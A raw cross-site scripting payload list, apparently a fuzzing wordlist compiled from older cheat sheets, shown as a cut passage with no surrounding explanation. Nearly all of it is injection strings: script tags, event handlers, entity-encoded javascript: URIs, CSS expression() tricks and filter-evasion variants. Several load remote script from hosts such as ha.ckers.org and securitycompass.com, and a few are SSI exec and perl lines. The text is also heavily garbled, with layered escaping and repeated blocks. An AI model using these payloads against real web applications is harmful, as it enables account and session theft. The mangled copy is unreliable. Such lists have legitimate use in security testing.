HREF=\\\"(\\\'XSS\\\');\\\">\\r\\n<TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<TD BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<DIV STYLE=\\\"background-image: url((\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"width: alert(\\\'XSS\\\'));\\\">\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://hacker.com/xss.html\\\">\\r\\n<EMBED SRC=\\\"http://hacker.com/xss.swf\\\" AllowScriptAccess=\\\"always\\\">\\r\\n&apos;;alert(String.fromCharCode(88,83,83))//\\\\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}\\r\\n&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&lt;BASE HREF=&quot;(&apos;XSS&apos;);//&quot;&gt;\\r\\n&lt;BGSOUND SRC=&quot;(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;BODY BACKGROUND=&quot;(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;BODY =alert(&apos;XSS&apos;)&gt;\\r\\n&lt;DIV STYLE=&quot;background-image: url((&apos;XSS&apos;))&quot;&gt;\\r\\n&lt;DIV STYLE=&quot;background-image: url(&amp;#1;(&apos;XSS&apos;))&quot;&gt;\\r\\n&lt;DIV STYLE=&quot;width: alert(&apos;XSS&apos;));&quot;&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;IFRAME SRC=&quot;(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=(&apos;XSS&apos;)&gt;\\r\\n&lt;IMG DYNSRC=&quot;(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG LOWSRC=&quot;(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser\\r\\nexp/*&lt;XSS STYLE=&apos;no\\\\xss:noxss(&quot;*//*&quot;);\\r\\n&lt;STYLE&gt;li {list-style-image: url(&quot;(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;IMG SRC=&apos;(&quot;XSS&quot;)&apos;&gt;\\r\\n&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;\\r\\n&lt;IMG SRC=&quot;;quot;&gt;\\r\\n%BCscript%BEalert(%A2XSS%A2)%BC/script%BE\\r\\n&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;;quot;&gt;\\r\\n&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;\\r\\na=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;;quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);\\r\\n&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;\\r\\n&lt;XSS STYLE=&quot;xss:alert(&apos;XSS&apos;))&quot;&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(&quot;(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;\\r\\n&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;\\r\\n&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;\\r\\n&lt;STYLE&gt;BODY{:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;\\r\\n&lt;TABLE BACKGROUND=&quot;(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;\\r\\n&lt;HTML xmlns:xss&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;\\r\\n&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;\\r\\n&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;\\r\\n&lt;!--[if gte IE 4]&gt; \\r\\n&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;\\r\\n&lt;XSS STYLE=&quot;(http://ha.ckers.org/xss.htc);&quot;&gt;\\r\\n&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;\\r\\n&lt;? echo(&apos;&lt;SCR)&apos;;\\r\\n&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;\\r\\n&lt;IMG SRC=(&apos;XSS&apos;)&gt;\\r\\n&lt;IMG SRC=(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;IMG SRC=`(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;\\r\\n&lt;IMG SRC=(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;DIV STYLE=&quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028&apos;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029&apos;\\\\0029&quot;&gt;\\r\\n&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;\\r\\n\\\\";alert('XSS');//\\r\\n</TITLE>\\r\\n<STYLE>@im\\\\port'\\\\ja\\\\vasc\\\\ript:alert("XSS")';</STYLE>\\r\\n\\ HREF="http://66.102.7.147/">XSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\ndocument.vulnerable=true;\\r\\n<img SRC=\\\";\\\">\\r\\n<img SRC=\\\";\\\">\\r\\n<img SRC=\\\"  ;\\\">\\r\\n<body !#$%&()*~+-_.,:;?@[/|\\\\]^`=document.vulnerable=true;>\\r\\n<document.vulnerable=true;//<\\r\\n<script <B>document.vulnerable=true;\\r\\n<img SRC=\\\";\\\"\\r\\n<iframe src=\\\"; <\\r\\na=/XSS/\\\\ndocument.vulnerable=true;\\r\\n\\\\\\\";document.vulnerable=true;;//\\r\\n</title>document.vulnerable=true;\\r\\n<input TYPE=\\\"IMAGE\\\" SRC=\\\";\\\">\\r\\n<body BACKGROUND=\\\";\\\">\\r\\n<body =document.vulnerable=true;>\\r\\n<img DYNSRC=\\\";\\\">\\r\\n<img LOWSRC=\\\";\\\">\\r\\n<bgsound SRC=\\\";\\\">\\r\\n<br SIZE=\\\"&{document.vulnerable=true}\\\">\\r\\n<LAYER SRC=\\\";\\\"></LAYER>\\r\\n<link REL=\\\"stylesheet\\\" HREF=\\\";\\\">\\r\\n<style>li {list-style-image: url(\\\";\\\");</STYLE><UL><LI>XSS\\r\\n<img SRC=\\\';\\\'>\\r\\n1script3document.vulnerable=true;1/script3\\r\\n<meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=;\\\">\\r\\n<meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=;\\\">\\r\\n<IFRAME SRC=\\\";\\\"></iframe>\\r\\n<FRAMESET><FRAME SRC=\\\";\\\"></frameset>\\r\\n<table BACKGROUND=\\\";\\\">\\r\\n<table><TD BACKGROUND=\\\";\\\">\\r\\n<div STYLE=\\\"background-image: url(;)\\\">\\r\\n<div STYLE=\\\"background-image: url(;)\\\">\\r\\n<div STYLE=\\\"width: document.vulnerable=true);\\\">\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';</style>\\r\\n<img STYLE=\\\"xss:expr/*XSS*/ession(document.vulnerable=true)\\\">\\r\\n<XSS STYLE=\\\"xss:document.vulnerable=true)\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)\\\'>\\r\\n<style TYPE=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<style>.XSS{background-image:url(\\\"\\\");}</STYLE><A CLASS=XSS></a>\\r\\n<style type=\\\"text/css\\\">BODY{background:url(\\\"\\\")}</style>\\r\\n<!--[if gte IE 4]>document.vulnerable=true;<![endif]-->\\r\\n<base HREF=\\\";//\\\">\\r\\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=;</object>\\r\\n<XML ID=I><X><C><![<IMG SRC=\\\"javas]]<![cript:document.vulnerable=true;\\\">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>\\r\\n<XML ID=\\\"xss\\\"><I><B><IMG SRC=\\\"javas<!-- -->cript:document.vulnerable=true\\\"></B></I></XML><SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"></span>\\r\\n<html><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS<SCRIPT DEFER>document.vulnerable=true\\\"></BODY></html>\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>document.vulnerable=true\\\'); ?>\\r\\n<meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=document.vulnerable=true\\\">\\r\\n<head><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>\\r\\n<a href=\\\"javascript#document.vulnerable=true;\\\">\\r\\n<div =\\\"document.vulnerable=true;\\\">\\r\\n<img src=\\\";\\\">\\r\\n<img dynsrc=\\\";\\\">\\r\\n<input type=\\\"image\\\" dynsrc=\\\";\\\">\\r\\n<bgsound src=\\\";\\\">\\r\\n&document.vulnerable=true;\\r\\n&{document.vulnerable=true;};\\r\\n<img src=&{document.vulnerable=true;};>\\r\\n<link rel=\\\"stylesheet\\\" href=\\\";\\\">\\r\\n<iframe src=\\\";\\\">\\r\\n<img src=\\\";\\\">\\r\\n<img src=\\\";\\\">\\r\\n<a href=\\\"about:document.vulnerable=true;\\\">\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=;\\\">\\r\\n<body =\\\"document.vulnerable=true;\\\">\\r\\n<div style=\\\"background-image: url(;);\\\">\\r\\n<div style=\\\"behaviour: url([link to code]);\\\">\\r\\n<div style=\\\"binding: url([link to code]);\\\">\\r\\n<div style=\\\"width: document.vulnerable=true;);\\\">\\r\\n<style type=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<object classid=\\\"clsid:...\\\" codebase=\\\";\\\">\\r\\n<style><!--</style>document.vulnerable=true;//-->\\r\\n<document.vulnerable=true;\\r\\n<![<!--]]document.vulnerable=true;//-->\\r\\n<!-- -- -->document.vulnerable=true;<!-- -- -->\\r\\n<img src=\\\"blah\\\"=\\\"document.vulnerable=true;\\\">\\r\\n<img src=\\\"blah>\\\" =\\\"document.vulnerable=true;\\\">\\r\\n<xml src=\\\";\\\">\\r\\n<xml id=\\\"X\\\"><a><b>document.vulnerable=true;;</b></a></xml>\\r\\n<div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"></div>\\r\\n[\\\\xC0][\\\\xBC]script>document.vulnerable=true;[\\\\xC0][\\\\xBC]/script>\\r\\n<style>@import\\\'http://www.securitycompass.com/xss.css\\\';</style>\\r\\n<meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\\\">\\r\\n<style>BODY{:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}</style>\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"></object>\\r\\n<HTML xmlns:xss><?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"><xss:xss>XSS</xss:xss></html>\\r\\n<script SRC=\\\"http://www.securitycompass.com/xss.jpg\\\">\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js>\\\'\\\"-->\\r\\n<script a=\\\">\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script =\\\">\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script a=\\\">\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script \\\"a=\\\'>\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script a=`>` SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script a=\\\">\\\'>\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n(\\\"<SCRI\\\");PT SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<div style=\\\"binding: url(http://www.securitycompass.com/xss.js);\\\"> [Mozilla]\\r\\n"><BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert("XSS")>\\r\\n\\r\\n
\\r\\nalert(1)\\r\\n
\\r\\nperl -e 'print \\\\"\\\\";' > out\\r\\nperl -e 'print \\\\"alert(\\\\"XSS\\\\")\\\\";' > out\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression=\\\"http://www.procheckup.com/?sid=\\\"+)>\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n<~/XSS STYLE=xss:alert(\\\'XSS\\\'))>\\r\\n\\\">alert(\\\'XSS\\\')\\r\\n</XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n</XSS STYLE=xss:alert(\\\'XSS\\\'))>\\r\\n\\\';;alert(String.fromCharCode(88,83,83))//\\\\\\\';;alert(String.fromCharCode(88,83,83))//\\\";;alert(String.fromCharCode(88,83,83))//\\\\\\\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;\\\";>;\\\';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;\\r\\n\\\';\\\';;!--\\\";<;XSS>;=&;{()}\\r\\n<;SCRIPT>;alert(\\\';XSS\\\';)<;/SCRIPT>;\\r\\n<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;\\r\\n<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;\\r\\n<;BASE HREF=\\\";(\\\';XSS\\\';);//\\\";>;\\r\\n<;BGSOUND SRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;BODY BACKGROUND=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;BODY =alert(\\\';XSS\\\';)>;\\r\\n<;DIV STYLE=\\\";background-image: url((\\\';XSS\\\';))\\\";>;\\r\\n<;DIV STYLE=\\\";background-image: url(&;#1;(\\\';XSS\\\';))\\\";>;\\r\\n<;DIV STYLE=\\\";width: alert(\\\';XSS\\\';));\\\";>;\\r\\n<;FRAMESET>;<;FRAME SRC=\\\";(\\\';XSS\\\';);\\\";>;<;/FRAMESET>;\\r\\n<;IFRAME SRC=\\\";(\\\';XSS\\\';);\\\";>;<;/IFRAME>;\\r\\n<;INPUT TYPE=\\\";IMAGE\\\"; SRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=(\\\';XSS\\\';)>;\\r\\n<;IMG DYNSRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG LOWSRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\";>;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser\\r\\nexp/*<;XSS STYLE=\\\';no\\\\xss:noxss(\\\";*//*\\\";);\\r\\n<;STYLE>;li {list-style-image: url(\\\";('XSS')\\\";);}<;/STYLE>;<;UL>;<;LI>;XSS\\r\\n<;IMG SRC=\\\';(\\\";XSS\\\";)\\\';>;\\r\\n<;LAYER SRC=\\\";http://ha.ckers.org/scriptlet.html\\\";>;<;/LAYER>;\\r\\n<;IMG SRC=\\\";\\\";>;\\r\\nalert(\\\';XSS\\\';);\\r\\n\\\\\\\";;alert(\\\';XSS\\\';);//\\r\\n<;/TITLE>;<;SCRIPT>;alert(\\\"XSS\\\");<;/SCRIPT>;\\r\\n<;STYLE>;@im\\\\port\\\';\\\\ja\\\\vasc\\\\ript:alert(\\\";XSS\\\";)\\\';;<;/STYLE>;\\r\\n<;IMG SRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x09;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x0A;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x0D;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC = \\\"; javascript : a l e r t \\\'; X S S \\\'; ) \\\"; >; \\r\\nperl -e \\\';print \\\";<;IM SRC=java\\\\0script:alert(\\\";XSS\\\";)>\\\";;\\\';>; out\\r\\nperl -e \\\';print \\\";&;<;SCR\\\\0IPT>;alert(\\\";XSS\\\";)<;/SCR\\\\0IPT>;\\\";;\\\'; >; out\\r\\n<;IMG SRC=\\\"; &;#14; (\\\';XSS\\\';);\\\";>;\\r\\n<;SCRIPT/XSS SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;BODY !#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\";XSS\\\";)>;\\r\\n<;SCRIPT SRC=http://ha.ckers.org/xss.js\\r\\n<;SCRIPT SRC=//ha.ckers.org/.j>;\\r\\n<;IMG SRC=\\\";(\\\';XSS\\\';)\\\";\\r\\n<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;\\r\\n<;<;SCRIPT>;alert(\\\";XSS\\\";);//<;<;/SCRIPT>;\\r\\n<;IMG \\\";\\\";\\\";>;<;SCRIPT>;alert(\\\";XSS\\\";)<;/SCRIPT>;\\\";>;\\r\\n<;SCRIPT>;a=/XSS/\\r\\n<;SCRIPT a=\\\";>;\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT =\\\";blah\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT a=\\\";blah\\\"; \\\';\\\'; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT \\\";a=\\\';>;\\\';\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT a=`>;` SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT>;(\\\";<;SCRI\\\";);<;/SCRIPT>;PT SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT a=\\\";>\\\';>\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;A HREF=\\\";http://66.102.7.147/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://www.google.com\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://1113982867/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://0x42.0x0000066.0x7.0x93/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://0102.0146.0007.00000223/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";h tt p://6&;#09;6.000146.0x7.147/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";//www.google.com/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";//google\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://ha.ckers.org@google\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://google:ha.ckers.org\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://google.com/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://www.google.com./\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";\\\';http://www.google.com/\\\';\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://www.gohttp://www.google.com/ogle.com/\\\";>;XSS<;/A>;\\r\\ndocument.vulnerable=true;\\r\\n<img SRC=\\\";\\\">\\r\\n<img SRC=\\\";\\\">\\r\\n<img SRC=\\\"  ;\\\">\\r\\n<body !#$%&()*~+-_.,:;?@[/|\\\\]^`=document.vulnerable=true;>\\r\\n<document.vulnerable=true;//<\\r\\n<script <B>document.vulnerable=true;\\r\\n<img SRC=\\\";\\\"\\r\\n<iframe src=\\\"; <\\r\\na=/XSS/\\\\ndocument.vulnerable=true;\\r\\n\\\\\\\";document.vulnerable=true;;//\\r\\n</title>document.vulnerable=true;\\r\\n<input TYPE=\\\"IMAGE\\\" SRC=\\\";\\\">\\r\\n<body BACKGROUND=\\\";\\\">\\r\\n<body =document.vulnerable=true;>\\r\\n<img DYNSRC=\\\";\\\">\\r\\n<img LOWSRC=\\\";\\\">\\r\\n<bgsound SRC=\\\";\\\">\\r\\n<br SIZE=\\\"&{document.vulnerable=true}\\\">\\r\\n<LAYER SRC=\\\";\\\"></LAYER>\\r\\n<link REL=\\\"stylesheet\\\" HREF=\\\";\\\">\\r\\n<style>li {list-style-image: url(\\\";\\\");</STYLE><UL><LI>XSS\\r\\n<img SRC=\\\';\\\'>\\r\\n1script3document.vulnerable=true;1/script3\\r\\n<meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=;\\\">\\r\\n<meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=;\\\">\\r\\n<IFRAME SRC=\\\";\\\"></iframe>\\r\\n<FRAMESET><FRAME SRC=\\\";\\\"></frameset>\\r\\n<table BACKGROUND=\\\";\\\">\\r\\n<table><TD BACKGROUND=\\\";\\\">\\r\\n<div STYLE=\\\"background-image: url(;)\\\">\\r\\n<div STYLE=\\\"background-image: url(;)\\\">\\r\\n<div STYLE=\\\"width: document.vulnerable=true);\\\">\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';</style>\\r\\n<img STYLE=\\\"xss:expr/*XSS*/ession(document.vulnerable=true)\\\">\\r\\n<XSS STYLE=\\\"xss:document.vulnerable=true)\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)\\\'>\\r\\n<style TYPE=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<style>.XSS{background-image:url(\\\"\\\");}</STYLE><A CLASS=XSS></a>\\r\\n<style type=\\\"text/css\\\">BODY{background:url(\\\"\\\")}</style>\\r\\n<!--[if gte IE 4]>document.vulnerable=true;<![endif]-->\\r\\n<base HREF=\\\";//\\\">\\r\\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=;</object>\\r\\n<XML ID=I><X><C><![<IMG SRC=\\\"javas]]<![cript:document.vulnerable=true;\\\">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>\\r\\n<XML ID=\\\"xss\\\"><I><B><IMG SRC=\\\"javas<!-- -->cript:document.vulnerable=true\\\"></B></I></XML><SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"></span>\\r\\n<html><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS<SCRIPT DEFER>document.vulnerable=true\\\"></BODY></html>\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>document.vulnerable=true\\\'); ?>\\r\\n<meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=document.vulnerable=true\\\">\\r\\n<head><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>\\r\\n<a href=\\\"javascript#document.vulnerable=true;\\\">\\r\\n<div =\\\"document.vulnerable=true;\\\">\\r\\n<img src=\\\";\\\">\\r\\n<img dynsrc=\\\";\\\">\\r\\n<input type=\\\"image\\\" 